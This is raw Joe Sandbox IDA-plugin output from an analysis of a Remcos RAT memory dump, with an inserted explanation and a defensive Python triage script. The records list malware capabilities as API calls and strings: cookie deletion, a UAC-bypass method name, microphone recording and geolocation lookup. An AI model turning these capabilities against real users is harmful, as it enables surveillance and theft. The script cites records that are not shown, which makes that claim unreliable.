                                                                        • Instruction Fuzzy Hash: 43418231E00149ABEB48EB73DC55AED7738AF24318FC09168E50A661E4DF345B8BCB94
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,291A4EE0,29195FB4,?,00000000,29138037,00000000), ref: 29137A00
                                                                        • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,29138037,00000000,?,?,0000000A,00000000), ref: 29137A48
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,29138037,00000000,?,?,0000000A,00000000), ref: 29137A88
                                                                        • MoveFileW.KERNEL32(00000000,00000000), ref: 29137AA5
                                                                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 29137AD0
                                                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 29137AE0
                                                                          • Part of subcall function 29134B96: WaitForSingleObject.KERNEL32(?,000000FF,?,291A4EF8,29134C49,00000000,?,?,?,291A4EF8,?), ref: 29134BA5
                                                                          • Part of subcall function 29134B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,2913548B), ref: 29134BC3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                        • String ID: .part
                                                                        • API String ID: 1303771098-3499674018
                                                                        • Opcode ID: e39d9053897da103aea2590d523fea91bddc10be2612132fde6484e9914dd9d1
                                                                        • Instruction ID: 761426a53a84d1d26a82e4d10baeebf0f15f615a49edec9af4e4118ede119eb1
                                                                        • Opcode Fuzzy Hash: e39d9053897da103aea2590d523fea91bddc10be2612132fde6484e9914dd9d1
                                                                        • Instruction Fuzzy Hash: CE31F331508344BFD344DB22DC4499BB7BCFFA0359F80891DF48692140EB34AB09CB9A
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,2915DD92,?,?,?,2917AF1A,00000001,00000001,?), ref: 2917AD23
                                                                        • __alloca_probe_16.LIBCMT ref: 2917AD5B
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,2915DD92,?,?,?,2917AF1A,00000001,00000001,?), ref: 2917ADA9
                                                                        • __alloca_probe_16.LIBCMT ref: 2917AE40
                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 2917AEA3
                                                                        • __freea.LIBCMT ref: 2917AEB0
                                                                          • Part of subcall function 291761B8: HeapAlloc.KERNEL32(00000000,29165329,?,?,291688C7,?,?,00000000,?,?,2913DE9D,29165329,?,?,?,?), ref: 291761EA
                                                                        • __freea.LIBCMT ref: 2917AEB9
                                                                        • __freea.LIBCMT ref: 2917AEDE
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                        • String ID:
                                                                        • API String ID: 2597970681-0
                                                                        • Opcode ID: 9531322a7bb5a8e9561564ae9e3380b0355aeae01c636b23834d9330bb2a8679
                                                                        • Instruction ID: 39738ebd43145aeba56ac8effb7b99fa0607ebd4bd811207b749ccfdd13d3451
                                                                        • Opcode Fuzzy Hash: 9531322a7bb5a8e9561564ae9e3380b0355aeae01c636b23834d9330bb2a8679
                                                                        • Instruction Fuzzy Hash: BE51E372A00317ABDB198EA2CD44EEB77B9EF44658F118629FD14D6180EF34DE4286A0
                                                                        APIs
                                                                        • SendInput.USER32 ref: 29149A25
                                                                        • SendInput.USER32(00000001,?,0000001C,00000000), ref: 29149A4D
                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 29149A74
                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 29149A92
                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 29149AB2
                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 29149AD7
                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 29149AF9
                                                                        • SendInput.USER32(00000001,00000000,0000001C), ref: 29149B1C
                                                                          • Part of subcall function 291499CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 291499D4
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InputSend$Virtual
                                                                        • String ID:
                                                                        • API String ID: 1167301434-0
                                                                        • Opcode ID: 5e920e99d7644890d44b477362f27a6ec8cdef5e1370ce4a6de43f0612ac761e
                                                                        • Instruction ID: e4f3c37ae1a7b6aa6147cdc232b27edc79cf60201cdbdd3d996489cf48851a40
                                                                        • Opcode Fuzzy Hash: 5e920e99d7644890d44b477362f27a6ec8cdef5e1370ce4a6de43f0612ac761e
                                                                        • Instruction Fuzzy Hash: DF319F21648349A9E210DFA6DC44F9FFBECAFD9F44F00280FB58457194CAA0CA4D8767
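The records above are the raw per-function output of the Joe Sandbox IDA plugin, and reading them by hand is slow. As an added example that is not part of the report or of Joe Sandbox's own tooling, the following Python script parses records of this shape and flags the behaviours the records in this section document: the Shell_NotifyIconA tray icon labelled Remcos, the NtAllocateVirtualMemory / explorer.exe strings next to GetCurrentProcess, the CreateFileW / WriteFile / MoveFileW sequence with the ".part" suffix, ShellExecuteExA paired with WaitForSingleObject and DeleteFileA, the repeated SendInput calls, and the StartForward / StartReverse command strings. The sample input is transcribed from the records above, trimmed to the lines the parser needs; the flag names and the heuristics behind them are the example's own choices, and the rule that a record ends at its "Opcode ID" line is an assumption about the format, not something the report states.

```python
"""Triage helper for Joe Sandbox per-function records (added example, not Joe Sandbox code).

Each record becomes a Function; flag_function() applies the example's own heuristics
for the behaviours seen in the Remcos payload dump (process 8, SndVol.exe host)."""
import re
from dataclasses import dataclass, field

# One API line: optional "Part of subcall function X: " prefix, Name.MODULE(args), ref: addr.
# Lines such as "__alloca_probe_16.LIBCMT ref: ..." have neither args nor a comma.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
HEX8_RE = re.compile(r"^[0-9A-F]{8}$")  # 32-bit immediates / addresses as IDA prints them


@dataclass
class Function:
    apis: list = field(default_factory=list)     # (name, module, ref, via_subcall)
    strings: list = field(default_factory=list)  # "String ID" entries plus literal API args
    opcode_id: str = ""

    def calls(self, name):
        return any(a[0] == name for a in self.apis)

    def has_string(self, needle):
        return any(needle in s for s in self.strings)


def parse_records(text):
    """One Function per record; a record is closed by its 'Opcode ID' line (assumption)."""
    funcs, cur = [], Function()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line.startswith("Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
            funcs.append(cur)
            cur = Function()
        elif line.startswith("String ID:"):
            cur.strings += [s for s in line.split(":", 1)[1].strip().split("$") if s]
        elif (m := API_RE.match(line)):
            cur.apis.append((m["name"], m["mod"], m["ref"], m["sub"] is not None))
            for tok in (m["args"] or "").split(","):
                tok = tok.strip()
                # '?' is an unresolved argument and an 8-digit hex token is an immediate;
                # anything else is a string literal IDA recovered from the dump
                if tok and tok != "?" and not HEX8_RE.match(tok):
                    cur.strings.append(tok)
    return funcs


def flag_function(f):
    """Heuristic labels; each is this example's reading of a record, not a report verdict."""
    flags = []
    if f.calls("Shell_NotifyIconA") and f.has_string("Remcos"):
        flags.append("tray-icon-with-rat-name")
    if f.has_string("NtAllocateVirtualMemory") and f.has_string("explorer.exe"):
        flags.append("remote-alloc-targeting-explorer")
    if all(f.calls(n) for n in ("CreateFileW", "WriteFile", "MoveFileW")) and f.has_string(".part"):
        flags.append("staged-download-rename")
    if all(f.calls(n) for n in ("ShellExecuteExA", "WaitForSingleObject", "DeleteFileA")):
        flags.append("run-dropped-file-then-delete")
    if sum(a[0] == "SendInput" for a in f.apis) >= 2:
        flags.append("synthetic-keyboard-input")
    if f.has_string("StartForward") or f.has_string("StartReverse"):
        flags.append("port-forwarding-commands")
    return flags


def triage(text):
    """Map the first 12 hex digits of each flagged record's Opcode ID to its flags."""
    out = {}
    for f in parse_records(text):
        flags = flag_function(f)
        if flags:
            out[f.opcode_id[:12]] = flags
    return out


# Constructed sample: records transcribed from this report section, trimmed to the
# lines the parser uses (the last record is a plain CRT helper and should not flag).
SAMPLE = r"""
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 2914D507
  • Part of subcall function 2914D5A0: RegisterClassExA.USER32(00000030), ref: 2914D5EC
• lstrcpynA.KERNEL32(291A4B60,Remcos,00000080), ref: 2914D558
• Shell_NotifyIconA.SHELL32(00000000,291A4B48), ref: 2914D56E
• String ID: Remcos
• Opcode ID: 25f8f76299612918c816bba62639d310168af73c7db930f189a103ac59ccf6c8
• GetCurrentProcess.KERNEL32(291A2B14,00000000,00008000,?,00000000,00000001,00000000,29137691,C:\Windows\SysWOW64\SndVol.exe), ref: 291374D9
• String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
• Opcode ID: 7753eb2563f676f28239786bff3ea2a83d3949bff1a9ac155844a3b548300a2c
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 29137A00
• WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 29137A48
• MoveFileW.KERNEL32(00000000,00000000), ref: 29137AA5
• DeleteFileW.KERNEL32(00000000,?,?), ref: 29137AE0
• String ID: .part
• Opcode ID: e39d9053897da103aea2590d523fea91bddc10be2612132fde6484e9914dd9d1
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,291960B4), ref: 29147E17
• DeleteFileA.KERNEL32(00000000), ref: 29147E2F
• ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 29147DE3
• String ID: <$@$Temp
• Opcode ID: 4f1fd085edf0fae60d8fce210d75db6418205b555639983917c47139e6699b85
• SendInput.USER32 ref: 29149A25
• SendInput.USER32(00000001,?,0000001C,00000000), ref: 29149A4D
  • Part of subcall function 291499CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 291499D4
• Opcode ID: 5e920e99d7644890d44b477362f27a6ec8cdef5e1370ce4a6de43f0612ac761e
• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
• Opcode ID: 2bfcb552fcf0bdaa772e89bb0de36070af4d49be984e3cdaa48c4c8999bac40c
• __alloca_probe_16.LIBCMT ref: 29183F6A
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000), ref: 29183F32
• Opcode ID: ad23beb065c7c156370f83a788db507be94707203095234ad8a2fd32242fbbc7
"""
```

Running `triage(SAMPLE)` returns six flagged records keyed by the start of their Opcode ID and leaves the MultiByteToWideChar helper out; the same function can be pointed at the full text of this section to rank every record before opening the dump in IDA. The heuristics deliberately key on API combinations plus a string, since a lone CreateFileW or DeleteFileA is too common in CRT and installer code to be worth a look.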
APIs
• _free.LIBCMT ref: 29179292
• _free.LIBCMT ref: 291792B6
• _free.LIBCMT ref: 2917943D
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,2918F244), ref: 2917944F
• WideCharToMultiByte.KERNEL32(00000000,00000000,291A2764,000000FF,00000000,0000003F,00000000,?,?), ref: 291794C7
• WideCharToMultiByte.KERNEL32(00000000,00000000,291A27B8,000000FF,?,0000003F,00000000,?), ref: 291794F4
• _free.LIBCMT ref: 29179609
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
• API ID: _free$ByteCharMultiWide$InformationTimeZone
• String ID:
• API String ID: 314583886-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,2917BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 2917B47E
• __fassign.LIBCMT ref: 2917B4F9
• __fassign.LIBCMT ref: 2917B514
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 2917B53A
• WriteFile.KERNEL32(?,FF8BC35D,00000000,2917BBB1,00000000,?,?,?,?,?,?,?,?,?,2917BBB1,?), ref: 2917B559
• WriteFile.KERNEL32(?,?,00000001,2917BBB1,00000000,?,?,?,?,?,?,?,?,?,2917BBB1,?), ref: 2917B592
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
APIs
• _strftime.LIBCMT ref: 29131D50
  • Part of subcall function 29131A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 29131AD9
• waveInUnprepareHeader.WINMM(291A2A88,00000020,00000000,?), ref: 29131E02
• waveInPrepareHeader.WINMM(291A2A88,00000020), ref: 29131E40
• waveInAddBuffer.WINMM(291A2A88,00000020), ref: 29131E4F
Strings
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
• API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
• String ID: %Y-%m-%d %H.%M$.wav
• API String ID: 3809562944-3597965672
APIs
  • Part of subcall function 291435E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 29143605
  • Part of subcall function 291435E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 29143622
  • Part of subcall function 291435E1: RegCloseKey.KERNEL32(?), ref: 2914362D
• ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 2913BFA6
• PathFileExistsA.SHLWAPI(?), ref: 2913BFB3
Strings
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
• API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
• String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
• API String ID: 1133728706-4073444585
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
• API ID:
• String ID:
• API String ID:
APIs
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 2914B438
• InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 2914B44E
• InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 2914B467
• InternetCloseHandle.WININET(00000000), ref: 2914B4AD
• InternetCloseHandle.WININET(00000000), ref: 2914B4B0
Strings
• http://geoplugin.net/json.gp, xrefs: 2914B448
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
• API ID: Internet$CloseHandleOpen$FileRead
• String ID: http://geoplugin.net/json.gp
• API String ID: 3121278467-91888290
APIs
  • Part of subcall function 29180CC1: _free.LIBCMT ref: 29180CEA
• _free.LIBCMT ref: 29180FC8
  • Part of subcall function 29176802: HeapFree.KERNEL32(00000000,00000000,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?), ref: 29176818
  • Part of subcall function 29176802: GetLastError.KERNEL32(?,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?,?), ref: 2917682A
• _free.LIBCMT ref: 29180FD3
• _free.LIBCMT ref: 29180FDE
• _free.LIBCMT ref: 29181032
• _free.LIBCMT ref: 2918103D
• _free.LIBCMT ref: 29181048
• _free.LIBCMT ref: 29181053
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
Memory Dump Source
• Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 04431EC8
• int.LIBCPMT ref: 04431EDB
  • Part of subcall function 0442EE19: std::_Lockit::_Lockit.LIBCPMT ref: 0442EE2A
  • Part of subcall function 0442EE19: std::_Lockit::~_Lockit.LIBCPMT ref: 0442EE44
• std::_Facet_Register.LIBCPMT ref: 04431F1B
• std::_Lockit::~_Lockit.LIBCPMT ref: 04431F24
• __CxxThrowException@8.LIBVCRUNTIME ref: 04431F42
Strings
Memory Dump Source
• Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID: (mG
• API String ID: 2536120697-4059303827
APIs
• GetLastError.KERNEL32(?,?,2916A3D1,2916933E), ref: 2916A3E8
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 2916A3F6
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2916A40F
• SetLastError.KERNEL32(00000000,?,2916A3D1,2916933E), ref: 2916A461
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\SysWOW64\SndVol.exe), ref: 2913760B
  • Part of subcall function 29137538: _wcslen.LIBCMT ref: 2913755C
  • Part of subcall function 29137538: CoGetObject.OLE32(?,00000024,29196528,00000000), ref: 291375BD
• CoUninitialize.OLE32 ref: 29137664
Strings
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
• API ID: InitializeObjectUninitialize_wcslen
• String ID: C:\Windows\SysWOW64\SndVol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
• API String ID: 3851391207-991305910
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 2913BB18
• GetLastError.KERNEL32 ref: 2913BB22
Strings
• UserProfile, xrefs: 2913BAE8
• [Chrome Cookies not found], xrefs: 2913BB3C
• \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 2913BAE3
• [Chrome Cookies found, cleared!], xrefs: 2913BB48
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
• API ID: DeleteErrorFileLast
• String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
• API String ID: 2018770650-304995407
                                                                        • Opcode ID: 61de1e1bfa97dbe0847e7b4cb36f02732e11c43c65b8a9368f0cc22c01a1b1cb
                                                                        • Instruction ID: fca839772ef1fd2e694fd9e70643ef7c221bdc4f901857676239b29e79caab34
                                                                        • Opcode Fuzzy Hash: 61de1e1bfa97dbe0847e7b4cb36f02732e11c43c65b8a9368f0cc22c01a1b1cb
                                                                        • Instruction Fuzzy Hash: AE01A231E940087B6B48B7B7CC568BE7739AA3119CBC09129E4066219CFE069B0B86D6
                                                                        APIs
                                                                        • AllocConsole.KERNEL32(291A5338), ref: 2914CE35
                                                                        • ShowWindow.USER32(00000000,00000000), ref: 2914CE4E
                                                                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 2914CE73
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Console$AllocOutputShowWindow
                                                                        • String ID: Remcos v$5.1.2 Pro$CONOUT$
                                                                        • API String ID: 2425139147-1584637518
                                                                        • Opcode ID: f200817ff015f5be90f6b400b02e80cdd4cf4cfbd44c7262f04ef15406a94603
                                                                        • Instruction ID: a5f2ba10cb5b83ed8dd2d46446557f1ba1f4d1af589237a52db37d74dddc3165
                                                                        • Opcode Fuzzy Hash: f200817ff015f5be90f6b400b02e80cdd4cf4cfbd44c7262f04ef15406a94603
                                                                        • Instruction Fuzzy Hash: 2E017571E503087BF710F7F38D89FCDB7BCAB25709F901411B608A7089D7689B158661
                                                                        APIs
                                                                        • __allrem.LIBCMT ref: 2916ACE9
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2916AD05
                                                                        • __allrem.LIBCMT ref: 2916AD1C
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2916AD3A
                                                                        • __allrem.LIBCMT ref: 2916AD51
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2916AD6F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                        • String ID:
                                                                        • API String ID: 1992179935-0
                                                                        • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                        • Instruction ID: 39c4493f04e3957310524b07294e161959e650859e75c33084491ce9da8a10ad
                                                                        • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                        • Instruction Fuzzy Hash: 5C811B72E007066BE3149E2BCC41B9A73B9AF9076CF10452AE511D66E1E774EB938790
                                                                        APIs
                                                                        • __allrem.LIBCMT ref: 0445BA06
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0445BA22
                                                                        • __allrem.LIBCMT ref: 0445BA39
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0445BA57
                                                                        • __allrem.LIBCMT ref: 0445BA6E
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0445BA8C
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                        • String ID:
                                                                        • API String ID: 1992179935-0
                                                                        • Opcode ID: 6f0b9a52672becd6d12090cab2f29d952f5634d7502a8c5c8529f3b178371a34
                                                                        • Instruction ID: 8e363ee7dec14c2d50bffcead99a25eeb0da54ebad9f7dd35b575ccd9e48b398
                                                                        • Opcode Fuzzy Hash: 6f0b9a52672becd6d12090cab2f29d952f5634d7502a8c5c8529f3b178371a34
                                                                        • Instruction Fuzzy Hash: 2281E772600B45ABFF21AE6ACC41B6B73A8EF41724F24412FE911D67A3E770F9408751
                                                                        APIs
                                                                          • Part of subcall function 291417D7: SetLastError.KERNEL32(0000000D,29141D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,29141D35), ref: 291417DD
                                                                        • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,29141D35), ref: 29141D72
                                                                        • GetNativeSystemInfo.KERNEL32(?,2913D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,29141D35), ref: 29141DE0
                                                                        • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 29141E04
                                                                          • Part of subcall function 29141CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,29141E22,?,00000000,00003000,00000040,00000000,?,?), ref: 29141CEE
                                                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 29141E4B
                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 29141E52
                                                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 29141F65
                                                                          • Part of subcall function 291420B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,29141F72,?,?,?,?,?), ref: 29142122
                                                                          • Part of subcall function 291420B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 29142129
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                        • String ID:
                                                                        • API String ID: 3950776272-0
                                                                        • Opcode ID: 7e6f520cbb15c4e540305937f4bc3ff15e27c64d2225069608144b67f24962ca
                                                                        • Instruction ID: 47c804b402f00fc12418cd526a75ccbf7c650a5d07adf041239cbccdc692e267
                                                                        • Opcode Fuzzy Hash: 7e6f520cbb15c4e540305937f4bc3ff15e27c64d2225069608144b67f24962ca
                                                                        • Instruction Fuzzy Hash: D1612570F00601ABD7149F27CD84BAA7BA5FF6C748F006129ED09AB281DB74E657CB90
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __cftoe
                                                                        • String ID:
                                                                        • API String ID: 4189289331-0
                                                                        • Opcode ID: e7d6ca56838f51dfff2c9447782ac8305bd833e22cb3174cceaa3010851b1d7b
                                                                        • Instruction ID: 8baab279806c9ab2f645cfd6b30f297d7736cd64d3ea451055645c4feb12faf1
                                                                        • Opcode Fuzzy Hash: e7d6ca56838f51dfff2c9447782ac8305bd833e22cb3174cceaa3010851b1d7b
                                                                        • Instruction Fuzzy Hash: C351E832D00307BBDB548B6A8C81EEE77B9EF4537CF10862AE91896191EB35D702C664
                                                                        APIs
                                                                        Memory Dump Source
